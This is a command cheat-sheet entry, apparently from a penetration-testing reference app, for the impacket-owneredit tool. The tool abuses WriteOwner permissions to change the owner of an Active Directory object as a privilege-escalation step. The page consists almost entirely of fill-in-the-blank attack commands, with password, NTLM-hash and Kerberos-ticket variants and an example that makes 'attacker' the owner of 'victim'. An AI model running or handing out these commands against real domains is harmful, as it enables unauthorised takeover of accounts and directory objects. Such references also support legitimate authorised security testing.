Impacket owneredit

Change the owner of an AD object (WriteOwner abuse)

Tool
impacket-owneredit
Category
Privilege Escalation / ACL / DACL Abuse
Platform
linux
Requires
password
Protocols
LDAP

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

impacket-owneredit -action write -new-owner '<user>' -target '<target>' '<domain>/<user>:<password>' -dc-ip '<ip>'

Credential variants

The same attack using a different authentication material.

NTLM Hash requires NTLM hash

impacket-owneredit -action write -new-owner '<user>' -target '<target>' -hashes ':<hash>' '<domain>/<user>' -dc-ip '<ip>'

Kerberos Ticket requires Kerberos ticket

impacket-owneredit -action write -new-owner '<user>' -target '<target>' -k -no-pass '<domain>/<user>' -dc-ip '<ip>'

Examples

impacket-owneredit -action write -new-owner 'attacker' -target 'victim' 'CORP.LOCAL/user:password' -dc-ip '192.168.1.100'

Tags

impacket owner acl privilege-escalation write-owner